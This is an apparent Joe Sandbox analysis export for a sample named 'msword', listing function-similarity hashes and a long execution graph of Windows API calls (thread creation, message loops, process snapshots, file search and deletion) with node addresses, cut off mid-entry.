                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID: lstrlen$CharNextlstrcmpi
                                                                            • String ID:
                                                                            • API String ID: 190613189-0
                                                                            • Opcode ID: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                                                            • Instruction ID: 82a91399e33c41d3abe84131f59dcd741317d7299bce3ff9d06b8c6e92496674
                                                                            • Opcode Fuzzy Hash: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                                                            • Instruction Fuzzy Hash: D5F0CD31205988EFCB019FA9CD04C9FBBA8EF56350B2180AAE840E7310D630EE01DBA4

                                                                            Execution Graph

                                                                            Execution Coverage:4.3%
                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                            Signature Coverage:2.2%
                                                                            Total number of Nodes:2000
                                                                            Total number of Limit Nodes:100
                                                                            execution_graph 97831 271066 97836 27aaaa 97831->97836 97833 27106c 97869 292f70 97833->97869 97837 27aacb 97836->97837 97872 2902eb 97837->97872 97841 27ab12 97882 281207 97841->97882 97844 281207 59 API calls 97845 27ab26 97844->97845 97846 281207 59 API calls 97845->97846 97847 27ab30 97846->97847 97848 281207 59 API calls 97847->97848 97849 27ab6e 97848->97849 97850 281207 59 API calls 97849->97850 97851 27ac39 97850->97851 97887 290588 97851->97887 97855 27ac6b 97856 281207 59 API calls 97855->97856 97857 27ac75 97856->97857 97915 28fe2b 97857->97915 97859 27acbc 97860 27accc GetStdHandle 97859->97860 97861 2b2f39 97860->97861 97862 27ad18 97860->97862 97861->97862 97863 2b2f42 97861->97863 97864 27ad20 OleInitialize 97862->97864 97922 2d70f3 64 API calls Mailbox 97863->97922 97864->97833 97866 2b2f49 97923 2d77c2 CreateThread 97866->97923 97868 2b2f55 CloseHandle 97868->97864 97995 292e74 97869->97995 97871 271076 97924 2903c4 97872->97924 97875 2903c4 59 API calls 97876 29032d 97875->97876 97877 281207 59 API calls 97876->97877 97878 290339 97877->97878 97931 281821 97878->97931 97880 27aad1 97881 2907bb 6 API calls 97880->97881 97881->97841 97883 290fe6 Mailbox 59 API calls 97882->97883 97884 281228 97883->97884 97885 290fe6 Mailbox 59 API calls 97884->97885 97886 27ab1c 97885->97886 97886->97844 97888 281207 59 API calls 97887->97888 97889 290598 97888->97889 97890 281207 59 API calls 97889->97890 97891 2905a0 97890->97891 97990 2810c3 97891->97990 97894 2810c3 59 API calls 97895 2905b0 97894->97895 97896 281207 59 API calls 97895->97896 97897 2905bb 97896->97897 97898 290fe6 Mailbox 59 API calls 97897->97898 97899 27ac43 97898->97899 97900 28ff4c 97899->97900 97901 28ff5a 97900->97901 97902 281207 59 API calls 97901->97902 97903 28ff65 97902->97903 97904 281207 59 API calls 97903->97904 97905 28ff70 97904->97905 97906 281207 59 API calls 97905->97906 97907 28ff7b 97906->97907 97908 281207 59 API calls 97907->97908 97909 28ff86 97908->97909 97910 2810c3 59 API calls 97909->97910 97911 28ff91 97910->97911 97912 290fe6 Mailbox 59 API calls 97911->97912 97913 28ff98 RegisterWindowMessageW 97912->97913 97913->97855 97916 2c620c 97915->97916 97917 28fe3b 97915->97917 97993 2da12a 59 API calls 97916->97993 97919 290fe6 Mailbox 59 API calls 97917->97919 97921 28fe43 97919->97921 97920 2c6217 97921->97859 97922->97866 97923->97868 97994 2d77a8 65 API calls 97923->97994 97925 281207 59 API calls 97924->97925 97926 2903cf 97925->97926 97927 281207 59 API calls 97926->97927 97928 2903d7 97927->97928 97929 281207 59 API calls 97928->97929 97930 290323 97929->97930 97930->97875 97932 28189a 97931->97932 97933 28182d __NMSG_WRITE 97931->97933 97944 281981 97932->97944 97936 281868 97933->97936 97937 281843 97933->97937 97935 28184b _memmove 97935->97880 97941 281c7e 97936->97941 97940 281b7c 59 API calls Mailbox 97937->97940 97940->97935 97948 290fe6 97941->97948 97943 281c88 97943->97935 97945 28198f 97944->97945 97947 281998 _memmove 97944->97947 97945->97947 97986 281aa4 97945->97986 97947->97935 97951 290fee 97948->97951 97950 291008 97950->97943 97951->97950 97953 29100c std::exception::exception 97951->97953 97958 29593c 97951->97958 97975 2935d1 DecodePointer 97951->97975 97976 2987cb RaiseException 97953->97976 97955 291036 97977 298701 58 API calls _free 97955->97977 97957 291048 97957->97943 97959 2959b7 97958->97959 97967 295948 97958->97967 97984 2935d1 DecodePointer 97959->97984 97961 2959bd 97985 298d58 58 API calls __getptd_noexit 97961->97985 97964 29597b RtlAllocateHeap 97964->97967 97974 2959af 97964->97974 97966 2959a3 97982 298d58 58 API calls __getptd_noexit 97966->97982 97967->97964 97967->97966 97971 2959a1 97967->97971 97972 295953 97967->97972 97981 2935d1 DecodePointer 97967->97981 97983 298d58 58 API calls __getptd_noexit 97971->97983 97972->97967 97978 29a39b 58 API calls 2 library calls 97972->97978 97979 29a3f8 58 API calls 7 library calls 97972->97979 97980 2932cf GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 97972->97980 97974->97951 97975->97951 97976->97955 97977->97957 97978->97972 97979->97972 97981->97967 97982->97971 97983->97974 97984->97961 97985->97974 97987 281ab7 97986->97987 97989 281ab4 _memmove 97986->97989 97988 290fe6 Mailbox 59 API calls 97987->97988 97988->97989 97989->97947 97991 281207 59 API calls 97990->97991 97992 2810cb 97991->97992 97992->97894 97993->97920 97996 292e80 _fseek 97995->97996 98003 293447 97996->98003 98002 292ea7 _fseek 98002->97871 98020 299e3b 98003->98020 98005 292e89 98006 292eb8 DecodePointer DecodePointer 98005->98006 98007 292ee5 98006->98007 98008 292e95 98006->98008 98007->98008 98066 2989d4 59 API calls __beginthreadex 98007->98066 98017 292eb2 98008->98017 98010 292f48 EncodePointer EncodePointer 98010->98008 98011 292f1c 98011->98008 98015 292f36 EncodePointer 98011->98015 98068 298a94 61 API calls 2 library calls 98011->98068 98012 292ef7 98012->98010 98012->98011 98067 298a94 61 API calls 2 library calls 98012->98067 98015->98010 98016 292f30 98016->98008 98016->98015 98069 293450 98017->98069 98021 299e4c 98020->98021 98022 299e5f EnterCriticalSection 98020->98022 98027 299ec3 98021->98027 98022->98005 98024 299e52 98024->98022 98051 2932e5 58 API calls 3 library calls 98024->98051 98028 299ecf _fseek 98027->98028 98029 299ed8 98028->98029 98030 299ef0 98028->98030 98052 29a39b 58 API calls 2 library calls 98029->98052 98033 299f11 _fseek 98030->98033 98055 298a4d 58 API calls __malloc_crt 98030->98055 98033->98024 98034 299edd 98053 29a3f8 58 API calls 7 library calls 98034->98053 98035 299f05 98037 299f1b 98035->98037 98038 299f0c 98035->98038 98041 299e3b __lock 58 API calls 98037->98041 98056 298d58 58 API calls __getptd_noexit 98038->98056 98039 299ee4 98054 2932cf GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 98039->98054 98044 299f22 98041->98044 98045 299f2f 98044->98045 98046 299f47 98044->98046 98057 29a05b InitializeCriticalSectionAndSpinCount 98045->98057 98058 292f85 98046->98058 98049 299f3b 98064 299f63 LeaveCriticalSection _doexit 98049->98064 98052->98034 98053->98039 98055->98035 98056->98033 98057->98049 98059 292fb7 __dosmaperr 98058->98059 98060 292f8e RtlFreeHeap 98058->98060 98059->98049 98060->98059 98061 292fa3 98060->98061 98065 298d58 58 API calls __getptd_noexit 98061->98065 98063 292fa9 GetLastError 98063->98059 98064->98033 98065->98063 98066->98012 98067->98011 98068->98016 98072 299fa5 LeaveCriticalSection 98069->98072 98071 292eb7 98071->98002 98072->98071 98073 2d92c8 98074 2d92db 98073->98074 98075 2d92d5 98073->98075 98077 292f85 _free 58 API calls 98074->98077 98079 2d92ec 98074->98079 98076 292f85 _free 58 API calls 98075->98076 98076->98074 98077->98079 98078 2d92fe 98079->98078 98080 292f85 _free 58 API calls 98079->98080 98080->98078 98081 276981 98088 27373a 98081->98088 98083 276997 98097 277b3f 98083->98097 98085 2769bf 98086 27584d 98085->98086 98109 2da48d 89 API calls 4 library calls 98085->98109 98089 273746 98088->98089 98090 273758 98088->98090 98110 27523c 98089->98110 98092 273787 98090->98092 98093 27375e 98090->98093 98095 27523c 59 API calls 98092->98095 98094 290fe6 Mailbox 59 API calls 98093->98094 98096 273750 98094->98096 98095->98096 98096->98083 98119 28162d 98097->98119 98099 277b64 _wcscmp 98103 277b98 Mailbox 98099->98103 98124 281a36 98099->98124 98103->98085 98106 2affc9 98107 27523c 59 API calls 98106->98107 98108 2affcd Mailbox 98106->98108 98107->98108 98108->98085 98109->98086 98111 27524a 98110->98111 98113 275250 98110->98113 98111->98113 98114 281c9c 98111->98114 98113->98096 98115 281caf 98114->98115 98116 281ca7 98114->98116 98115->98113 98118 281bcc 59 API calls 2 library calls 98116->98118 98118->98115 98120 290fe6 Mailbox 59 API calls 98119->98120 98121 281652 98120->98121 98122 290fe6 Mailbox 59 API calls 98121->98122 98123 281660 98122->98123 98123->98099 98125 281a45 __NMSG_WRITE _memmove 98124->98125 98126 290fe6 Mailbox 59 API calls 98125->98126 98127 281a83 98126->98127 98128 2817e0 98127->98128 98129 2bf401 98128->98129 98130 2817f2 98128->98130 98144 2c87f9 59 API calls _memmove 98129->98144 98138 281680 98130->98138 98133 2817fe 98137 273938 68 API calls 98133->98137 98134 2bf40b 98135 281c9c 59 API calls 98134->98135 98136 2bf413 Mailbox 98135->98136 98137->98106 98139 281692 98138->98139 98143 2816ba _memmove 98138->98143 98140 290fe6 Mailbox 59 API calls 98139->98140 98139->98143 98142 28176f _memmove 98140->98142 98141 290fe6 Mailbox 59 API calls 98141->98142 98142->98141 98143->98133 98144->98134 98145 2ae463 98146 27373a 59 API calls 98145->98146 98147 2ae479 98146->98147 98148 2ae4fa 98147->98148 98149 2ae48f 98147->98149 98157 27b020 98148->98157 98199 275376 60 API calls 98149->98199 98153 2ae4ee Mailbox 98155 2af046 Mailbox 98153->98155 98201 2da48d 89 API calls 4 library calls 98153->98201 98154 2ae4ce 98154->98153 98200 2d890a 59 API calls Mailbox 98154->98200 98202 283740 98157->98202 98160 2b30b6 98310 2da48d 89 API calls 4 library calls 98160->98310 98161 27b07f 98161->98160 98163 2b30d4 98161->98163 98184 27bb86 98161->98184 98196 27b132 Mailbox _memmove 98161->98196 98311 2da48d 89 API calls 4 library calls 98163->98311 98165 2b355e 98198 27b4dd 98165->98198 98354 2da48d 89 API calls 4 library calls 98165->98354 98167 2c730a 59 API calls 98167->98196 98168 290fe6 59 API calls Mailbox 98168->98196 98169 2b318a 98169->98198 98313 2da48d 89 API calls 4 library calls 98169->98313 98173 2b3106 98173->98169 98312 27a9de 301 API calls 98173->98312 98176 273b31 59 API calls 98176->98196 98179 2753b0 301 API calls 98179->98196 98180 2b3418 98320 2753b0 98180->98320 98183 2b3448 98183->98198 98348 2739be 98183->98348 98309 2da48d 89 API calls 4 library calls 98184->98309 98187 2b31c3 98314 2da48d 89 API calls 4 library calls 98187->98314 98188 273c30 68 API calls 98188->98196 98191 2b346f 98352 2da48d 89 API calls 4 library calls 98191->98352 98194 281c9c 59 API calls 98194->98196 98195 27523c 59 API calls 98195->98196 98196->98165 98196->98167 98196->98168 98196->98173 98196->98176 98196->98179 98196->98180 98196->98184 98196->98187 98196->98188 98196->98191 98196->98194 98196->98195 98196->98198 98207 273add 98196->98207 98214 27bc70 98196->98214 98297 273a40 98196->98297 98308 275190 59 API calls Mailbox 98196->98308 98315 2c6c62 59 API calls 2 library calls 98196->98315 98316 2ea9c3 85 API calls Mailbox 98196->98316 98317 2c6c1e 59 API calls Mailbox 98196->98317 98318 2d5ef2 68 API calls 98196->98318 98319 273ea3 68 API calls Mailbox 98196->98319 98353 2da12a 59 API calls 98196->98353 98198->98153 98199->98154 98200->98153 98201->98155 98203 28374f 98202->98203 98206 28376a 98202->98206 98204 281aa4 59 API calls 98203->98204 98205 283757 CharUpperBuffW 98204->98205 98205->98206 98206->98161 98208 2ad3cd 98207->98208 98209 273aee 98207->98209 98210 290fe6 Mailbox 59 API calls 98209->98210 98211 273af5 98210->98211 98212 273b16 98211->98212 98355 273ba5 59 API calls Mailbox 98211->98355 98212->98196 98215 2b359f 98214->98215 98226 27bc95 98214->98226 98483 2da48d 89 API calls 4 library calls 98215->98483 98217 27bf3b 98217->98196 98221 27c2b6 98221->98217 98222 27c2c3 98221->98222 98481 27c483 301 API calls Mailbox 98222->98481 98225 27c2ca LockWindowUpdate DestroyWindow GetMessageW 98225->98217 98227 27c2fc 98225->98227 98289 27bca5 Mailbox 98226->98289 98484 275376 60 API calls 98226->98484 98485 2c700c 301 API calls 98226->98485 98228 2b4509 TranslateMessage DispatchMessageW GetMessageW 98227->98228 98228->98228 98230 2b4539 98228->98230 98229 2b36b3 Sleep 98229->98289 98230->98217 98231 2b405d WaitForSingleObject 98236 2b407d GetExitCodeProcess CloseHandle 98231->98236 98231->98289 98232 27bf54 timeGetTime 98232->98289 98233 290fe6 59 API calls Mailbox 98233->98289 98235 27c210 Sleep 98235->98289 98245 27c36b 98236->98245 98237 281c9c 59 API calls 98237->98289 98238 281207 59 API calls 98271 2b3895 Mailbox 98238->98271 98239 2b43a9 Sleep 98239->98271 98243 27c324 timeGetTime 98482 275376 60 API calls 98243->98482 98245->98196 98248 2b4440 GetExitCodeProcess 98250 2b446c CloseHandle 98248->98250 98251 2b4456 WaitForSingleObject 98248->98251 98250->98271 98251->98250 98251->98289 98252 276cd8 279 API calls 98252->98289 98253 2f6562 110 API calls 98253->98271 98256 276d79 109 API calls 98256->98289 98257 2b38aa Sleep 98257->98289 98258 2b44c8 Sleep 98258->98289 98261 281a36 59 API calls 98261->98271 98262 275376 60 API calls 98262->98289 98267 27c26d 98270 281a36 59 API calls 98267->98270 98268 27b020 279 API calls 98268->98289 98274 27bf25 Mailbox 98270->98274 98271->98238 98271->98245 98271->98248 98271->98253 98271->98257 98271->98258 98271->98261 98271->98289 98509 2d2baf 60 API calls 98271->98509 98510 275376 60 API calls 98271->98510 98511 273ea3 68 API calls Mailbox 98271->98511 98512 276cd8 301 API calls 98271->98512 98553 2c70e2 59 API calls 98271->98553 98554 2d57ff QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 98271->98554 98555 29083e timeGetTime 98271->98555 98556 2d4148 CreateToolhelp32Snapshot Process32FirstW 98271->98556 98272 281a36 59 API calls 98272->98289 98274->98217 98480 27c460 10 API calls Mailbox 98274->98480 98277 275190 59 API calls Mailbox 98277->98289 98278 2753b0 279 API calls 98278->98289 98279 273a40 59 API calls 98279->98289 98280 2739be 68 API calls 98280->98289 98281 2da48d 89 API calls 98281->98289 98282 2b3e13 VariantClear 98282->98289 98283 2c7aad 59 API calls 98283->98289 98284 2c6cf1 59 API calls Mailbox 98284->98289 98285 2b3ea9 VariantClear 98285->98289 98286 2741c4 59 API calls Mailbox 98286->98289 98287 2b3c57 VariantClear 98287->98289 98288 273ea3 68 API calls 98288->98289 98289->98229 98289->98231 98289->98232 98289->98233 98289->98235 98289->98237 98289->98239 98289->98243 98289->98245 98289->98252 98289->98256 98289->98262 98289->98267 98289->98268 98289->98271 98289->98272 98289->98274 98289->98277 98289->98278 98289->98279 98289->98280 98289->98281 98289->98282 98289->98283 98289->98284 98289->98285 98289->98286 98289->98287 98289->98288 98356 2752b0 98289->98356 98365 279a00 98289->98365 98372 279c80 98289->98372 98403 27a820 98289->98403 98420 27e36d 98289->98420 98429 2842cf 98289->98429 98433 2dc270 98289->98433 98440 2dbcd6 98289->98440 98470 2de4a0 98289->98470 98473 2d412a 98289->98473 98476 2ee60c 98289->98476 98479 29083e timeGetTime 98289->98479 98486 2f6655 59 API calls 98289->98486 98487 2da058 59 API calls Mailbox 98289->98487 98488 2ce0aa 59 API calls 98289->98488 98489 274d37 98289->98489 98507 2c6c62 59 API calls 2 library calls 98289->98507 98508 2738ff 59 API calls 98289->98508 98513 2ec355 98289->98513 98298 273a53 98297->98298 98299 2ad3b1 98297->98299 98301 273a9a Mailbox 98298->98301 98303 273a7d 98298->98303 99207 273b31 98298->99207 98300 2ad3c1 98299->98300 99216 2c6d17 59 API calls 98299->99216 98301->98196 98305 273a83 98303->98305 98306 273b31 59 API calls 98303->98306 98305->98301 99215 275190 59 API calls Mailbox 98305->99215 98306->98305 98308->98196 98309->98160 98310->98198 98311->98198 98312->98169 98313->98198 98314->98198 98315->98196 98316->98196 98317->98196 98318->98196 98319->98196 98321 2753cf 98320->98321 98343 2753fd Mailbox 98320->98343 98322 290fe6 Mailbox 59 API calls 98321->98322 98322->98343 98323 2769fa 98324 281c9c 59 API calls 98323->98324 98344 275569 Mailbox 98324->98344 98325 2769ff 98326 2ae691 98325->98326 98327 2af165 98325->98327 99236 2da48d 89 API calls 4 library calls 98326->99236 99240 2da48d 89 API calls 4 library calls 98327->99240 98331 290fe6 59 API calls Mailbox 98331->98343 98332 2ae6a0 98332->98183 98333 281c9c 59 API calls 98333->98343 98335 2aea9a 98338 281c9c 59 API calls 98335->98338 98336 281207 59 API calls 98336->98343 98338->98344 98339 2aeb67 98339->98344 99237 2c7aad 59 API calls 98339->99237 98340 292f70 67 API calls __cinit 98340->98343 98342 2c7aad 59 API calls 98342->98343 98343->98323 98343->98325 98343->98326 98343->98331 98343->98333 98343->98335 98343->98336 98343->98339 98343->98340 98343->98342 98343->98344 98345 2aef28 98343->98345 98347 275a1a 98343->98347 99218 276e30 98343->99218 99235 277e50 301 API calls 2 library calls 98343->99235 98344->98183 99238 2da48d 89 API calls 4 library calls 98345->99238 99239 2da48d 89 API calls 4 library calls 98347->99239 98349 2739c9 98348->98349 98351 2739f0 98349->98351 99246 273ea3 68 API calls Mailbox 98349->99246 98351->98191 98352->98198 98353->98196 98354->98198 98355->98212 98357 2752c6 98356->98357 98359 275313 98356->98359 98358 2752d3 PeekMessageW 98357->98358 98357->98359 98358->98359 98360 2752ec 98358->98360 98359->98360 98362 2adf68 TranslateAcceleratorW 98359->98362 98363 275352 TranslateMessage DispatchMessageW 98359->98363 98364 27533e PeekMessageW 98359->98364 98566 27359e 98359->98566 98360->98289 98362->98359 98362->98364 98363->98364 98364->98359 98364->98360 98366 279a31 98365->98366 98367 279a1d 98365->98367 98605 2da48d 89 API calls 4 library calls 98366->98605 98571 2794e0 98367->98571 98369 279a28 98369->98289 98371 2b2478 98371->98371 98373 279cb5 98372->98373 98374 2b247d 98373->98374 98376 279d1f 98373->98376 98386 279d79 98373->98386 98375 2753b0 301 API calls 98374->98375 98377 2b2492 98375->98377 98379 281207 59 API calls 98376->98379 98376->98386 98401 279f50 Mailbox 98377->98401 98615 2da48d 89 API calls 4 library calls 98377->98615 98378 281207 59 API calls 98378->98386 98381 2b24d8 98379->98381 98383 292f70 __cinit 67 API calls 98381->98383 98382 292f70 __cinit 67 API calls 98382->98386 98383->98386 98384 2b24fa 98384->98289 98385 2739be 68 API calls 98385->98401 98386->98378 98386->98382 98386->98384 98389 279f3a 98386->98389 98386->98401 98388 2753b0 301 API calls 98388->98401 98389->98401 98616 2da48d 89 API calls 4 library calls 98389->98616 98390 27a775 98620 2da48d 89 API calls 4 library calls 98390->98620 98394 2b27f9 98394->98289 98395 274230 59 API calls 98395->98401 98397 2da48d 89 API calls 98397->98401 98401->98385 98401->98388 98401->98390 98401->98395 98401->98397 98402 27a058 98401->98402 98614 281bcc 59 API calls 2 library calls 98401->98614 98617 2c7aad 59 API calls 98401->98617 98618 2eccac 301 API calls 98401->98618 98619 2ebc26 301 API calls Mailbox 98401->98619 98621 275190 59 API calls Mailbox 98401->98621 98622 2e9ab0 301 API calls Mailbox 98401->98622 98402->98289 98404 2b2d51 98403->98404 98407 27a84c 98403->98407 98624 2da48d 89 API calls 4 library calls 98404->98624 98406 2b2d62 98406->98289 98408 2b2d6a 98407->98408 98416 27a888 _memmove 98407->98416 98625 2da48d 89 API calls 4 library calls 98408->98625 98410 27a962 98418 27a975 98410->98418 98623 2ea9c3 85 API calls Mailbox 98410->98623 98411 290fe6 59 API calls Mailbox 98411->98416 98413 2b2dae 98626 27a9de 301 API calls 98413->98626 98414 2753b0 301 API calls 98414->98416 98416->98410 98416->98411 98416->98413 98416->98414 98417 2b2dc8 98416->98417 98416->98418 98417->98418 98627 2da48d 89 API calls 4 library calls 98417->98627 98418->98289 98628 27502b 98420->98628 98422 27e381 98423 27e385 timeGetTime 98422->98423 98424 27e3bc Sleep 98422->98424 98425 27502b 59 API calls 98423->98425 98426 27e3b4 98424->98426 98427 27e39b 98425->98427 98426->98289 98428 27bc70 299 API calls 98427->98428 98428->98426 98430 2842e8 98429->98430 98431 2842d9 98429->98431 98430->98431 98432 2842ed CloseHandle 98430->98432 98431->98289 98432->98431 98434 274d37 84 API calls 98433->98434 98435 2dc286 98434->98435 98633 2d4005 98435->98633 98437 2dc28e 98438 2dc292 GetLastError 98437->98438 98439 2dc2a7 98437->98439 98438->98439 98439->98289 98441 2dbcf5 98440->98441 98467 2dbdbb Mailbox 98440->98467 98442 27502b 59 API calls 98441->98442 98444 2dbd00 98442->98444 98443 274d37 84 API calls 98445 2dbdf3 98443->98445 98447 27502b 59 API calls 98444->98447 98446 274d37 84 API calls 98445->98446 98448 2dbe05 98446->98448 98449 2dbd14 98447->98449 98772 2d3ce2 98448->98772 98451 281207 59 API calls 98449->98451 98449->98467 98452 2dbd25 98451->98452 98453 281207 59 API calls 98452->98453 98454 2dbd2e 98453->98454 98455 274d37 84 API calls 98454->98455 98456 2dbd3b 98455->98456 98457 290119 59 API calls 98456->98457 98458 2dbd4e 98457->98458 98459 2817e0 59 API calls 98458->98459 98460 2dbd5f 98459->98460 98461 2d412a 3 API calls 98460->98461 98469 2dbd88 Mailbox 98460->98469 98463 2dbd6e 98461->98463 98462 27502b 59 API calls 98462->98467 98464 281a36 59 API calls 98463->98464 98463->98469 98465 2dbd7f 98464->98465 98760 2d3f1d 98465->98760 98467->98443 98468 2dbdc3 Mailbox 98467->98468 98468->98289 98469->98462 98895 2df87d 98470->98895 98472 2de4b0 98472->98289 99026 2d494a GetFileAttributesW 98473->99026 99030 2ed1c6 98476->99030 98478 2ee61c 98478->98289 98479->98289 98480->98221 98481->98225 98482->98289 98483->98226 98484->98226 98485->98226 98486->98289 98487->98289 98488->98289 98490 274d51 98489->98490 98491 274d4b 98489->98491 98492 2adb28 __i64tow 98490->98492 98493 274d99 98490->98493 98495 274d57 __itow 98490->98495 98498 2ada2f 98490->98498 98491->98289 99139 2938c8 83 API calls 3 library calls 98493->99139 98497 290fe6 Mailbox 59 API calls 98495->98497 98499 274d71 98497->98499 98500 290fe6 Mailbox 59 API calls 98498->98500 98505 2adaa7 Mailbox _wcscpy 98498->98505 98499->98491 98501 281a36 59 API calls 98499->98501 98502 2ada74 98500->98502 98501->98491 98503 290fe6 Mailbox 59 API calls 98502->98503 98504 2ada9a 98503->98504 98504->98505 98506 281a36 59 API calls 98504->98506 99140 2938c8 83 API calls 3 library calls 98505->99140 98506->98505 98507->98289 98508->98289 98509->98271 98510->98271 98511->98271 98512->98271 98514 2ec39a 98513->98514 98515 2ec380 98513->98515 99141 2ea8fd 98514->99141 99168 2da48d 89 API calls 4 library calls 98515->99168 98519 2753b0 300 API calls 98520 2ec406 98519->98520 98521 2ec392 Mailbox 98520->98521 98522 2ec498 98520->98522 98525 2ec447 98520->98525 98521->98289 98523 2ec4ee 98522->98523 98524 2ec49e 98522->98524 98523->98521 98526 274d37 84 API calls 98523->98526 99169 2d7ed5 59 API calls 98524->99169 98530 2d789a 59 API calls 98525->98530 98528 2ec500 98526->98528 98531 281aa4 59 API calls 98528->98531 98529 2ec4c1 99170 2835b9 59 API calls Mailbox 98529->99170 98533 2ec477 98530->98533 98534 2ec524 CharUpperBuffW 98531->98534 98536 2c6ebc 300 API calls 98533->98536 98537 2ec53e 98534->98537 98535 2ec4c9 Mailbox 98540 27b020 300 API calls 98535->98540 98536->98521 98538 2ec545 98537->98538 98539 2ec591 98537->98539 99148 2d789a 98538->99148 98541 274d37 84 API calls 98539->98541 98540->98521 98542 2ec599 98541->98542 99171 275376 60 API calls 98542->99171 98547 2ec5a3 98547->98521 98548 274d37 84 API calls 98547->98548 98549 2ec5be 98548->98549 99172 2835b9 59 API calls Mailbox 98549->99172 98551 2ec5ce 98552 27b020 300 API calls 98551->98552 98552->98521 98553->98271 98554->98271 98555->98271 99199 2d4ce2 98556->99199 98558 2d4195 Process32NextW 98559 2d4244 CloseHandle 98558->98559 98565 2d418e Mailbox 98558->98565 98559->98271 98560 281207 59 API calls 98560->98565 98561 281a36 59 API calls 98561->98565 98562 290119 59 API calls 98562->98565 98563 2817e0 59 API calls 98563->98565 98564 28151f 61 API calls 98564->98565 98565->98558 98565->98559 98565->98560 98565->98561 98565->98562 98565->98563 98565->98564 98567 2735e2 98566->98567 98569 2735b0 98566->98569 98567->98359 98568 2735d5 IsDialogMessageW 98568->98567 98568->98569 98569->98567 98569->98568 98570 2ad273 GetClassLongW 98569->98570 98570->98568 98570->98569 98572 2753b0 301 API calls 98571->98572 98573 27951f 98572->98573 98574 2b2001 98573->98574 98588 279527 _memmove 98573->98588 98607 275190 59 API calls Mailbox 98574->98607 98576 2b22c0 98613 2da48d 89 API calls 4 library calls 98576->98613 98578 2b22de 98578->98578 98579 279583 98579->98369 98580 279944 98583 290fe6 Mailbox 59 API calls 98580->98583 98581 27986a 98584 27987f 98581->98584 98585 2b22b1 98581->98585 98582 290fe6 59 API calls Mailbox 98582->98588 98597 2796e3 _memmove 98583->98597 98587 290fe6 Mailbox 59 API calls 98584->98587 98612 2ea983 59 API calls 98585->98612 98592 27977d 98587->98592 98588->98576 98588->98579 98588->98580 98588->98582 98589 2796cf 98588->98589 98600 279741 98588->98600 98589->98580 98591 2796dc 98589->98591 98590 290fe6 Mailbox 59 API calls 98595 27970e 98590->98595 98594 290fe6 Mailbox 59 API calls 98591->98594 98592->98369 98593 2b22a0 98611 2da48d 89 API calls 4 library calls 98593->98611 98594->98597 98595->98600 98606 27cca0 301 API calls 98595->98606 98597->98590 98597->98595 98597->98600 98600->98581 98600->98592 98600->98593 98601 2b2278 98600->98601 98603 2b2253 98600->98603 98608 278180 301 API calls 98600->98608 98610 2da48d 89 API calls 4 library calls 98601->98610 98609 2da48d 89 API calls 4 library calls 98603->98609 98605->98371 98606->98600 98607->98580 98608->98600 98609->98592 98610->98592 98611->98592 98612->98576 98613->98578 98614->98401 98615->98401 98616->98401 98617->98401 98618->98401 98619->98401 98620->98394 98621->98401 98622->98401 98623->98418 98624->98406 98625->98418 98626->98417 98627->98418 98629 275041 98628->98629 98630 27503c 98628->98630 98629->98422 98630->98629 98632 2937ba 59 API calls 98630->98632 98632->98629 98634 281207 59 API calls 98633->98634 98635 2d4024 98634->98635 98636 281207 59 API calls 98635->98636 98637 2d402d 98636->98637 98638 281207 59 API calls 98637->98638 98639 2d4036 98638->98639 98657 290284 98639->98657 98644 2d405c 98669 290119 98644->98669 98645 281900 59 API calls 98645->98644 98647 2d4070 FindFirstFileW 98648 2d40fc FindClose 98647->98648 98651 2d408f 98647->98651 98654 2d4107 Mailbox 98648->98654 98649 2d40d7 FindNextFileW 98649->98651 98650 281c9c 59 API calls 98650->98651 98651->98648 98651->98649 98651->98650 98652 2817e0 59 API calls 98651->98652 98720 281900 98651->98720 98652->98651 98654->98437 98656 2d40f3 FindClose 98656->98654 98727 2a1b70 98657->98727 98660 2902cd 98733 2819e1 98660->98733 98661 2902b0 98662 281821 59 API calls 98661->98662 98664 2902bc 98662->98664 98729 28133d 98664->98729 98667 2d4fec GetFileAttributesW 98668 2d404a 98667->98668 98668->98644 98668->98645 98670 281207 59 API calls 98669->98670 98671 29012f 98670->98671 98672 281207 59 API calls 98671->98672 98673 290137 98672->98673 98674 281207 59 API calls 98673->98674 98675 29013f 98674->98675 98676 281207 59 API calls 98675->98676 98677 290147 98676->98677 98678 2c627d 98677->98678 98679 29017b 98677->98679 98680 281c9c 59 API calls 98678->98680 98681 281462 59 API calls 98679->98681 98682 2c6286 98680->98682 98683 290189 98681->98683 98684 2819e1 59 API calls 98682->98684 98685 281981 59 API calls 98683->98685 98688 2901be 98684->98688 98686 290193 98685->98686 98686->98688 98689 281462 59 API calls 98686->98689 98687 2901fe 98737 281462 98687->98737 98688->98687 98691 2901dd 98688->98691 98700 2c62a6 98688->98700 98692 2901b4 98689->98692 98750 281609 98691->98750 98696 281981 59 API calls 98692->98696 98694 29020f 98699 290221 98694->98699 98701 281c9c 59 API calls 98694->98701 98695 2c6376 98697 281821 59 API calls 98695->98697 98696->98688 98715 2c6333 98697->98715 98702 290231 98699->98702 98703 281c9c 59 API calls 98699->98703 98700->98695 98704 2c635f 98700->98704 98713 2c62dd 98700->98713 98701->98699 98705 290238 98702->98705 98707 281c9c 59 API calls 98702->98707 98703->98702 98704->98695 98710 2c634a 98704->98710 98708 281c9c 59 API calls 98705->98708 98717 29023f Mailbox 98705->98717 98706 281462 59 API calls 98706->98687 98707->98705 98708->98717 98709 2c633b 98711 281821 59 API calls 98709->98711 98712 281821 59 API calls 98710->98712 98711->98715 98712->98715 98713->98709 98718 2c6326 98713->98718 98714 281609 59 API calls 98714->98715 98715->98687 98715->98714 98753 28153b 59 API calls 2 library calls 98715->98753 98717->98647 98719 281821 59 API calls 98718->98719 98719->98715 98721 281914 98720->98721 98722 2bf534 98720->98722 98755 2818a5 98721->98755 98724 281c7e 59 API calls 98722->98724 98726 2bf53f __NMSG_WRITE _memmove 98724->98726 98725 28191f DeleteFileW 98725->98649 98725->98656 98728 290291 GetFullPathNameW 98727->98728 98728->98660 98728->98661 98730 28134b 98729->98730 98731 281981 59 API calls 98730->98731 98732 28135b 98731->98732 98732->98667 98734 2819fb 98733->98734 98736 2819ee 98733->98736 98735 290fe6 Mailbox 59 API 